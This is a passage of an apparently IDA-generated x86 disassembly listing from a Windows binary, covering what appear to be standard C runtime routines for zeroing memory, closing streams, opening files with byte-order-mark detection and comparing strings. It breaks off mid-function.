sub_40E24D proc near ; CODE XREF: sub_40E0D9+15Ap
cmp dword ptr [ebp-1Ch], 0
jz short locret_40E25B
push 0
call sub_405CCF
pop ecx
locret_40E25B: ; CODE XREF: sub_40E24D+4j
retn
sub_40E24D endp
; =============== S U B R O U T I N E =======================================
sub_40E25C proc near ; CODE XREF: sub_40E0D9+162j
push ebx
call dword ptr [ebp-20h]
loc_40E260: ; CODE XREF: sub_40E0D9+16Cj
pop ecx
cmp ebx, 8
jz short loc_40E270
cmp ebx, 0Bh
jz short loc_40E270
cmp ebx, 4
jnz short loc_40E281
loc_40E270: ; CODE XREF: sub_40E25C+8j
; sub_40E25C+Dj
mov eax, [ebp-2Ch]
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40E281
mov eax, [ebp-30h]
mov [edi+64h], eax
loc_40E281: ; CODE XREF: sub_40E25C+12j
; sub_40E25C+1Dj
xor eax, eax
sub_40E25C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_40E0D9
loc_40E283: ; CODE XREF: sub_40E0D9+44j
; sub_40E0D9+CCj
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40E0D9
; =============== S U B R O U T I N E =======================================
sub_40E289 proc near ; CODE XREF: sub_407EC9+21p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_427F98, eax
retn
sub_40E289 endp
; =============== S U B R O U T I N E =======================================
sub_40E293 proc near ; CODE XREF: sub_407EC9+1Bp
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_427FA4, eax
retn
sub_40E293 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E29D proc near ; CODE XREF: sub_40E2F4+31p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov [ebp+var_4], edi
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
shr ecx, 7
pxor xmm0, xmm0
jmp short loc_40E2BD
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
db 90h
; ---------------------------------------------------------------------------
loc_40E2BD: ; CODE XREF: sub_40E29D+16j
; sub_40E29D+4Ej
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm0
movdqa oword ptr [edi+20h], xmm0
movdqa oword ptr [edi+30h], xmm0
movdqa oword ptr [edi+40h], xmm0
movdqa oword ptr [edi+50h], xmm0
movdqa oword ptr [edi+60h], xmm0
movdqa oword ptr [edi+70h], xmm0
lea edi, [edi+80h]
dec ecx
jnz short loc_40E2BD
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40E29D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E2F4 proc near ; CODE XREF: sub_407F20+27j
; sub_40E2F4+7Dp
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], edi
mov eax, [ebp+arg_0]
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
test edi, edi
jnz short loc_40E34E
mov ecx, [ebp+arg_8]
mov edx, ecx
and edx, 7Fh
mov [ebp+var_C], edx
cmp ecx, edx
jz short loc_40E333
sub ecx, edx
push ecx
push eax
call sub_40E29D
add esp, 8
mov eax, [ebp+arg_0]
mov edx, [ebp+var_C]
loc_40E333: ; CODE XREF: sub_40E2F4+2Bj
test edx, edx
jz short loc_40E37C
add eax, [ebp+arg_8]
sub eax, edx
mov [ebp+var_8], eax
xor eax, eax
mov edi, [ebp+var_8]
mov ecx, [ebp+var_C]
rep stosb
mov eax, [ebp+arg_0]
jmp short loc_40E37C
; ---------------------------------------------------------------------------
loc_40E34E: ; CODE XREF: sub_40E2F4+1Cj
neg edi
add edi, 10h
mov [ebp+var_10], edi
xor eax, eax
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_10]
rep stosb
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
add ecx, eax
sub edx, eax
push edx
push 0
push ecx
call sub_40E2F4
add esp, 0Ch
mov eax, [ebp+arg_0]
loc_40E37C: ; CODE XREF: sub_40E2F4+41j
; sub_40E2F4+58j
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40E2F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E383 proc near ; CODE XREF: sub_4084EB+Ep
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421B80
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
push 1
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], ebx
push 3
pop edi
loc_40E3A2: ; CODE XREF: sub_40E383+7Fj
mov [ebp+var_20], edi
cmp edi, dword_436940
jge short loc_40E404
mov esi, edi
shl esi, 2
mov eax, dword_435920
add eax, esi
cmp [eax], ebx
jz short loc_40E401
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_40E3D4
push eax
call sub_403890
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_40E3D4
inc [ebp+var_1C]
loc_40E3D4: ; CODE XREF: sub_40E383+40j
; sub_40E383+4Cj
cmp edi, 14h
jl short loc_40E401
mov eax, dword_435920
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:off_41D16C
mov eax, dword_435920
push dword ptr [esi+eax]
call sub_4039CF
pop ecx
mov eax, dword_435920
mov [esi+eax], ebx
loc_40E401: ; CODE XREF: sub_40E383+38j
; sub_40E383+54j
inc edi
jmp short loc_40E3A2
; ---------------------------------------------------------------------------
loc_40E404: ; CODE XREF: sub_40E383+28j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E419
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40E383 endp
; =============== S U B R O U T I N E =======================================
sub_40E419 proc near ; CODE XREF: sub_40E383+88p
; DATA XREF: fabskl8p:00421B98o
push 1
call sub_405CCF
pop ecx
retn
sub_40E419 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E422 proc near ; CODE XREF: sub_40EA60+72p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor ebx, ebx
test byte ptr [ebp+arg_8], 80h
push edi
push 10h
mov esi, eax
mov [ebp+var_14], ebx
mov [ebp+var_18], ebx
mov [ebp+var_2], bl
mov [ebp+var_28], 0Ch
mov [ebp+var_24], ebx
pop edi
jz short loc_40E454
mov [ebp+var_20], ebx
mov [ebp+var_1], 10h
jmp short loc_40E45E
; ---------------------------------------------------------------------------
loc_40E454: ; CODE XREF: sub_40E422+27j
mov [ebp+var_20], 1
mov [ebp+var_1], bl
loc_40E45E: ; CODE XREF: sub_40E422+30j
lea eax, [ebp+var_14]
push eax
call sub_410C39
test eax, eax
pop ecx
jz short loc_40E479
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403209
add esp, 14h
loc_40E479: ; CODE XREF: sub_40E422+48j
lea eax, [ebp+var_18]
push eax
call sub_407CB6
test eax, eax
pop ecx
jz short loc_40E494
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403209
add esp, 14h
loc_40E494: ; CODE XREF: sub_40E422+63j
mov eax, 8000h
test [ebp+arg_8], eax
jnz short loc_40E4B0
test [ebp+arg_8], 74000h
jnz short loc_40E4AC
cmp [ebp+var_14], eax
jz short loc_40E4B0
loc_40E4AC: ; CODE XREF: sub_40E422+83j
or [ebp+var_1], 80h
loc_40E4B0: ; CODE XREF: sub_40E422+7Aj
; sub_40E422+88j
mov eax, [ebp+arg_8]
push 3
pop edx
and eax, edx
sub eax, ebx
mov ecx, 80000000h
jz short loc_40E4FF
dec eax
jz short loc_40E4F6
dec eax
jz short loc_40E4ED
loc_40E4C7: ; CODE XREF: sub_40E422+F6j
; sub_40E422+14Fj ...
call sub_405B96
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_405B83
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_403305
add esp, 14h
jmp loc_40E97C
; ---------------------------------------------------------------------------
loc_40E4ED: ; CODE XREF: sub_40E422+A3j
mov [ebp+var_C], 0C0000000h
jmp short loc_40E502
; ---------------------------------------------------------------------------
loc_40E4F6: ; CODE XREF: sub_40E422+A0j
mov [ebp+var_C], 40000000h
jmp short loc_40E502
; ---------------------------------------------------------------------------
loc_40E4FF: ; CODE XREF: sub_40E422+9Dj
mov [ebp+var_C], ecx
loc_40E502: ; CODE XREF: sub_40E422+D2j
; sub_40E422+DBj
mov eax, [ebp+arg_C]
sub eax, edi
jz short loc_40E53E
sub eax, edi
jz short loc_40E535
sub eax, edi
jz short loc_40E52C
sub eax, edi
jz short loc_40E527
sub eax, 40h
jnz short loc_40E4C7
xor eax, eax
cmp [ebp+var_C], ecx
setz al
mov [ebp+var_8], eax
jmp short loc_40E541
; ---------------------------------------------------------------------------
loc_40E527: ; CODE XREF: sub_40E422+F1j
mov [ebp+var_8], edx
jmp short loc_40E541
; ---------------------------------------------------------------------------
loc_40E52C: ; CODE XREF: sub_40E422+EDj
mov [ebp+var_8], 2
jmp short loc_40E541
; ---------------------------------------------------------------------------
loc_40E535: ; CODE XREF: sub_40E422+E9j
mov [ebp+var_8], 1
jmp short loc_40E541
; ---------------------------------------------------------------------------
loc_40E53E: ; CODE XREF: sub_40E422+E5j
mov [ebp+var_8], ebx
loc_40E541: ; CODE XREF: sub_40E422+103j
; sub_40E422+108j ...
mov eax, [ebp+arg_8]
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
jg short loc_40E592
jz short loc_40E589
cmp eax, ebx
jz short loc_40E589
cmp eax, 100h
jz short loc_40E580
cmp eax, 200h
jz loc_40E604
cmp eax, 300h
jnz loc_40E4C7
mov [ebp+var_10], 2
jmp short loc_40E5AF
; ---------------------------------------------------------------------------
loc_40E580: ; CODE XREF: sub_40E422+13Dj
mov [ebp+var_10], 4
jmp short loc_40E5AF
; ---------------------------------------------------------------------------
loc_40E589: ; CODE XREF: sub_40E422+132j
; sub_40E422+136j
mov [ebp+var_10], 3
jmp short loc_40E5AF
; ---------------------------------------------------------------------------
loc_40E592: ; CODE XREF: sub_40E422+130j
cmp eax, 500h
jz short loc_40E5A8
cmp eax, 600h
jz short loc_40E604
cmp eax, edx
jnz loc_40E4C7
loc_40E5A8: ; CODE XREF: sub_40E422+175j
mov [ebp+var_10], 1
loc_40E5AF: ; CODE XREF: sub_40E422+15Cj
; sub_40E422+165j ...
mov ecx, [ebp+arg_8]
mov eax, 100h
test ecx, eax
mov edi, 80h
jz short loc_40E5D2
mov edx, dword_427AD4
not edx
and edx, [ebp+arg_10]
test dl, dl
js short loc_40E5D2
xor edi, edi
inc edi
loc_40E5D2: ; CODE XREF: sub_40E422+19Cj
; sub_40E422+1ABj
test cl, 40h
jz short loc_40E5EE
or [ebp+var_C], 10000h
or edi, 4000000h
cmp [ebp+var_18], 2
jnz short loc_40E5EE
or [ebp+var_8], 4
loc_40E5EE: ; CODE XREF: sub_40E422+1B3j
; sub_40E422+1C6j
test cx, 1000h
jz short loc_40E5F7
or edi, eax
loc_40E5F7: ; CODE XREF: sub_40E422+1D1j
test cl, 20h
jz short loc_40E60D
or edi, 8000000h
jmp short loc_40E618
; ---------------------------------------------------------------------------
loc_40E604: ; CODE XREF: sub_40E422+144j
; sub_40E422+17Cj
mov [ebp+var_10], 5
jmp short loc_40E5AF
; ---------------------------------------------------------------------------
loc_40E60D: ; CODE XREF: sub_40E422+1D8j
test cl, 10h
jz short loc_40E618
or edi, 10000000h
loc_40E618: ; CODE XREF: sub_40E422+1E0j
; sub_40E422+1EEj
call sub_40F260
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_40E63B
call sub_405B96
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_405B83
mov dword ptr [eax], 18h
jmp short loc_40E68B
; ---------------------------------------------------------------------------
loc_40E63B: ; CODE XREF: sub_40E422+200j
mov eax, [ebp+arg_0]
push ebx
push edi
push [ebp+var_10]
mov dword ptr [eax], 1
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
push [ebp+var_C]
push [ebp+arg_4]
call ds:off_41D06C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_40E697
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_435820[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
loc_40E67E: ; CODE XREF: sub_40E422+2A2j
call ds:dword_41D0EC ; RtlGetLastWin32Error
push eax
call sub_405BA9
loc_40E68A: ; CODE XREF: sub_40E422+345j
pop ecx
loc_40E68B: ; CODE XREF: sub_40E422+217j
call sub_405B83
mov eax, [eax]
jmp loc_40EA5B
; ---------------------------------------------------------------------------
loc_40E697: ; CODE XREF: sub_40E422+23Fj
push edi
call ds:dword_41D144 ; GetFileType
cmp eax, ebx
jnz short loc_40E6C6
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_435820[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
push edi
call ds:off_41D0D8
jmp short loc_40E67E
; ---------------------------------------------------------------------------
loc_40E6C6: ; CODE XREF: sub_40E422+27Ej
cmp eax, 2
jnz short loc_40E6D1
or [ebp+var_1], 40h
jmp short loc_40E6DA
; ---------------------------------------------------------------------------
loc_40E6D1: ; CODE XREF: sub_40E422+2A7j
cmp eax, 3
jnz short loc_40E6DA
or [ebp+var_1], 8
loc_40E6DA: ; CODE XREF: sub_40E422+2ADj
; sub_40E422+2B2j
push edi
push dword ptr [esi]
call sub_40F02F
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, dword_435820[edx*4]
pop ecx
pop ecx
mov cl, [ebp+var_1]
or cl, 1
mov [edx+eax+4], cl
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, dword_435820[edx*4]
lea eax, [edx+eax+24h]
and byte ptr [eax], 80h
mov [ebp+var_3], cl
and [ebp+var_3], 48h
mov [ebp+var_1], cl
jnz loc_40E7AD
test cl, 80h
jz loc_40E9E7
test byte ptr [ebp+arg_8], 2
jz short loc_40E7AD
push 2
or edi, 0FFFFFFFFh
push edi
push dword ptr [esi]
call sub_410B0B
add esp, 0Ch
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40E76C
call sub_405B96
cmp dword ptr [eax], 83h
jz short loc_40E7AD
loc_40E760: ; CODE XREF: sub_40E422+379j
; sub_40E422+389j ...
push dword ptr [esi]
call sub_408DFD
jmp loc_40E68A
; ---------------------------------------------------------------------------
loc_40E76C: ; CODE XREF: sub_40E422+32Fj
push 1
lea eax, [ebp+var_4]
push eax
push dword ptr [esi]
mov [ebp+var_4], bl
call sub_40A15D
add esp, 0Ch
test eax, eax
jnz short loc_40E79D
cmp [ebp+var_4], 1Ah
jnz short loc_40E79D
mov eax, [ebp+var_8]
cdq
push edx
push eax
push dword ptr [esi]
call sub_410957
add esp, 0Ch
cmp eax, edi
jz short loc_40E760
loc_40E79D: ; CODE XREF: sub_40E422+35Fj
; sub_40E422+365j
push ebx
push ebx
push dword ptr [esi]
call sub_410B0B
add esp, 0Ch
cmp eax, edi
jz short loc_40E760
loc_40E7AD: ; CODE XREF: sub_40E422+305j
; sub_40E422+318j ...
test [ebp+var_1], 80h
jz loc_40E9E7
mov ecx, 74000h
test [ebp+arg_8], ecx
mov edi, 4000h
jnz short loc_40E7D5
mov eax, [ebp+var_14]
and eax, ecx
jnz short loc_40E7D2
or [ebp+arg_8], edi
jmp short loc_40E7D5
; ---------------------------------------------------------------------------
loc_40E7D2: ; CODE XREF: sub_40E422+3A9j
or [ebp+arg_8], eax
loc_40E7D5: ; CODE XREF: sub_40E422+3A2j
; sub_40E422+3AEj
mov eax, [ebp+arg_8]
and eax, ecx
cmp eax, edi
jz short loc_40E822
cmp eax, 10000h
jz short loc_40E80E
cmp eax, 14000h
jz short loc_40E80E
cmp eax, 20000h
jz short loc_40E81C
cmp eax, 24000h
jz short loc_40E81C
cmp eax, 40000h
jz short loc_40E808
cmp eax, 44000h
jnz short loc_40E825
loc_40E808: ; CODE XREF: sub_40E422+3DDj
mov [ebp+var_2], 1
jmp short loc_40E825
; ---------------------------------------------------------------------------
loc_40E80E: ; CODE XREF: sub_40E422+3C1j
; sub_40E422+3C8j
mov ecx, [ebp+arg_8]
mov eax, 301h
and ecx, eax
cmp ecx, eax
jnz short loc_40E825
loc_40E81C: ; CODE XREF: sub_40E422+3CFj
; sub_40E422+3D6j
mov [ebp+var_2], 2
jmp short loc_40E825
; ---------------------------------------------------------------------------
loc_40E822: ; CODE XREF: sub_40E422+3BAj
mov [ebp+var_2], bl
loc_40E825: ; CODE XREF: sub_40E422+3E4j
; sub_40E422+3EAj ...
test [ebp+arg_8], 70000h
jz loc_40E9E7
test [ebp+var_1], 40h
mov [ebp+var_8], ebx
jnz loc_40E9E7
mov eax, [ebp+var_C]
mov ecx, 0C0000000h
and eax, ecx
cmp eax, 40000000h
jz loc_40E90B
cmp eax, 80000000h
jz short loc_40E8D2
cmp eax, ecx
jnz loc_40E9E7
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E9E7
cmp eax, 2
jbe short loc_40E881
cmp eax, 4
jbe short loc_40E8A8
loc_40E878: ; CODE XREF: sub_40E422+500j
cmp eax, 5
jnz loc_40E9E7
loc_40E881: ; CODE XREF: sub_40E422+44Fj
; sub_40E422+496j ...
movsx eax, [ebp+var_2]
xor edi, edi
dec eax
jz loc_40E9B4
dec eax
jnz loc_40E9E7
mov [ebp+var_8], 0FEFFh
mov [ebp+var_10], 2
jmp loc_40E9C2
; ---------------------------------------------------------------------------
loc_40E8A8: ; CODE XREF: sub_40E422+454j
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40D06E
add esp, 10h
or eax, edx
jz short loc_40E881
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40D06E
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_40E760
loc_40E8D2: ; CODE XREF: sub_40E422+437j
push 3
lea eax, [ebp+var_8]
push eax
push dword ptr [esi]
call sub_40A15D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E760
cmp eax, 2
jz short loc_40E95B
cmp eax, 3
jnz loc_40E9A6
cmp [ebp+var_8], 0BFBBEFh
jnz short loc_40E95B
mov [ebp+var_2], 1
jmp loc_40E9E7
; ---------------------------------------------------------------------------
loc_40E90B: ; CODE XREF: sub_40E422+42Cj
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E9E7
cmp eax, 2
jbe loc_40E881
cmp eax, 4
ja loc_40E878
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40D06E
add esp, 10h
or eax, edx
jz loc_40E881
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40D06E
add esp, 10h
and eax, edx
loc_40E94D: ; CODE XREF: sub_40E422+590j
cmp eax, 0FFFFFFFFh
jnz loc_40E9E7
jmp loc_40E760
; ---------------------------------------------------------------------------
loc_40E95B: ; CODE XREF: sub_40E422+4CCj
; sub_40E422+4DEj
mov eax, [ebp+var_8]
and eax, 0FFFFh
cmp eax, 0FFFEh
jnz short loc_40E983
push dword ptr [esi]
call sub_408DFD
pop ecx
call sub_405B83
push 16h
pop esi
mov [eax], esi
loc_40E97C: ; CODE XREF: sub_40E422+C6j
mov eax, esi
jmp loc_40EA5B
; ---------------------------------------------------------------------------
loc_40E983: ; CODE XREF: sub_40E422+546j
cmp eax, 0FEFFh
jnz short loc_40E9A6
push ebx
push 2
push dword ptr [esi]
call sub_410B0B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E760
mov [ebp+var_2], 2
jmp short loc_40E9E7
; ---------------------------------------------------------------------------
loc_40E9A6: ; CODE XREF: sub_40E422+4D1j
; sub_40E422+566j
push ebx
push ebx
push dword ptr [esi]
call sub_410B0B
add esp, 0Ch
jmp short loc_40E94D
; ---------------------------------------------------------------------------
loc_40E9B4: ; CODE XREF: sub_40E422+466j
mov [ebp+var_8], 0BFBBEFh
mov [ebp+var_10], 3
loc_40E9C2: ; CODE XREF: sub_40E422+481j
; sub_40E422+5C3j
mov eax, [ebp+var_10]
sub eax, edi
push eax
lea eax, [ebp+edi+var_8]
push eax
push dword ptr [esi]
call sub_40D7D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E760
add edi, eax
cmp [ebp+var_10], edi
jg short loc_40E9C2
loc_40E9E7: ; CODE XREF: sub_40E422+30Ej
; sub_40E422+38Fj ...
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_435820[ecx*4]
lea eax, [ecx+eax+24h]
mov cl, [eax]
xor cl, [ebp+var_2]
and cl, 7Fh
xor [eax], cl
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_435820[ecx*4]
lea eax, [ecx+eax+24h]
mov ecx, [ebp+arg_8]
mov dl, [eax]
shr ecx, 10h
shl cl, 7
and dl, 7Fh
or cl, dl
cmp [ebp+var_3], bl
mov [eax], cl
jnz short loc_40EA59
test byte ptr [ebp+arg_8], 8
jz short loc_40EA59
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_435820[eax*4]
lea eax, [eax+esi+4]
or byte ptr [eax], 20h
loc_40EA59: ; CODE XREF: sub_40E422+614j
; sub_40E422+61Aj
mov eax, ebx
loc_40EA5B: ; CODE XREF: sub_40E422+270j
; sub_40E422+55Cj
pop edi
pop esi
pop ebx
leave
retn
sub_40E422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EA60 proc near ; CODE XREF: sub_40EB2C+14p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 14h
push offset dword_421BA0
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
xor eax, eax
mov edi, [ebp+arg_10]
cmp edi, esi
setnz al
cmp eax, esi
jnz short loc_40EA9A
loc_40EA7F: ; CODE XREF: sub_40EA60+47j
; sub_40EA60+5Bj
call sub_405B83
push 16h
pop edi
mov [eax], edi
push esi
push esi
push esi
push esi
push esi
call sub_403305
add esp, 14h
mov eax, edi
jmp short loc_40EAF3
; ---------------------------------------------------------------------------
loc_40EA9A: ; CODE XREF: sub_40EA60+1Dj
or dword ptr [edi], 0FFFFFFFFh
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jz short loc_40EA7F
cmp [ebp+arg_14], esi
jz short loc_40EABD
mov eax, [ebp+arg_C]
and eax, 0FFFFFE7Fh
neg eax
sbb eax, eax
inc eax
jz short loc_40EA7F
loc_40EABD: ; CODE XREF: sub_40EA60+4Cj
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
mov eax, edi
call sub_40E422
add esp, 14h
mov [ebp+var_20], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40EAFE
mov eax, [ebp+var_20]
cmp eax, esi
jz short loc_40EAF3
or dword ptr [edi], 0FFFFFFFFh
loc_40EAF3: ; CODE XREF: sub_40EA60+38j
; sub_40EA60+8Ej
call __SEH_epilog4
retn
sub_40EA60 endp
; =============== S U B R O U T I N E =======================================
sub_40EAF9 proc near ; DATA XREF: fabskl8p:00421BB8o
xor esi, esi
mov edi, [ebp+18h]
sub_40EAF9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EAFE proc near ; CODE XREF: sub_40EA60+84p
cmp [ebp-1Ch], esi
jz short locret_40EB2B
cmp [ebp-20h], esi
jz short loc_40EB23
mov eax, [edi]
mov ecx, eax
sar ecx, 5
and eax, 1Fh
imul eax, 28h
mov ecx, dword_435820[ecx*4]
lea eax, [ecx+eax+4]
and byte ptr [eax], 0FEh
loc_40EB23: ; CODE XREF: sub_40EAFE+8j
push dword ptr [edi]
call sub_40F23E
pop ecx
locret_40EB2B: ; CODE XREF: sub_40EAFE+3j
retn
sub_40EAFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB2C proc near ; CODE XREF: sub_4085AF+26Dp
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40EA60
add esp, 18h
pop ebp
retn
sub_40EB2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB4A proc near ; CODE XREF: sub_40ED64+Ap
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push [ebp+arg_8]
lea ecx, [ebp+var_14]
call sub_402AEB
mov edx, [ebp+arg_0]
xor esi, esi
cmp edx, esi
jnz short loc_40EB94
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40EB8A
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EB8A: ; CODE XREF: sub_40EB4A+37j
mov eax, 7FFFFFFFh
jmp loc_40ED61
; ---------------------------------------------------------------------------
loc_40EB94: ; CODE XREF: sub_40EB4A+19j
push ebx
mov ebx, [ebp+arg_4]
cmp ebx, esi
jnz short loc_40EBCB
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40EBC1
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EBC1: ; CODE XREF: sub_40EB4A+6Ej
mov eax, 7FFFFFFFh
jmp loc_40ED60
; ---------------------------------------------------------------------------
loc_40EBCB: ; CODE XREF: sub_40EB4A+50j
mov eax, [ebp+var_10]
cmp [eax+8], esi
jnz short loc_40EBF7
lea eax, [ebp+var_14]
push eax
push ebx
push edx
call sub_402BA2
add esp, 0Ch
cmp [ebp+var_8], 0
jz loc_40ED60
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40ED60
; ---------------------------------------------------------------------------
loc_40EBF7: ; CODE XREF: sub_40EB4A+87j
push edi
mov edi, 200h
loc_40EBFD: ; CODE XREF: sub_40EB4A+1CDj
movzx cx, byte ptr [edx]
movzx ecx, cx
movzx esi, cl
inc edx
test byte ptr [esi+eax+1Dh], 4
mov [ebp+arg_0], edx
jz short loc_40EC6B
cmp byte ptr [edx], 0
jnz short loc_40EC1B
xor esi, esi
jmp short loc_40EC87
; ---------------------------------------------------------------------------
loc_40EC1B: ; CODE XREF: sub_40EB4A+CBj
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
dec edx
push edx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C6A9
add esp, 24h
cmp eax, 1
jnz short loc_40EC46
movzx ax, [ebp+var_4]
jmp short loc_40EC60
; ---------------------------------------------------------------------------
loc_40EC46: ; CODE XREF: sub_40EB4A+F3j
cmp eax, 2
jnz loc_40ED1C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40EC60: ; CODE XREF: sub_40EB4A+FAj
inc [ebp+arg_0]
movzx esi, ax
mov eax, [ebp+var_10]
jmp short loc_40EC87
; ---------------------------------------------------------------------------
loc_40EC6B: ; CODE XREF: sub_40EB4A+C6j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40EC84
movzx cx, byte ptr [ecx+11Dh]
movzx esi, cx
jmp short loc_40EC87
; ---------------------------------------------------------------------------
loc_40EC84: ; CODE XREF: sub_40EB4A+12Bj
movzx esi, dx
loc_40EC87: ; CODE XREF: sub_40EB4A+CFj
; sub_40EB4A+11Fj ...
movzx cx, byte ptr [ebx]
movzx ecx, cx
movzx edx, cl
inc ebx
test byte ptr [edx+eax+1Dh], 4
jz short loc_40ECEE
cmp byte ptr [ebx], 0
jnz short loc_40ECA2
xor ecx, ecx
jmp short loc_40ED0A
; ---------------------------------------------------------------------------
loc_40ECA2: ; CODE XREF: sub_40EB4A+152j
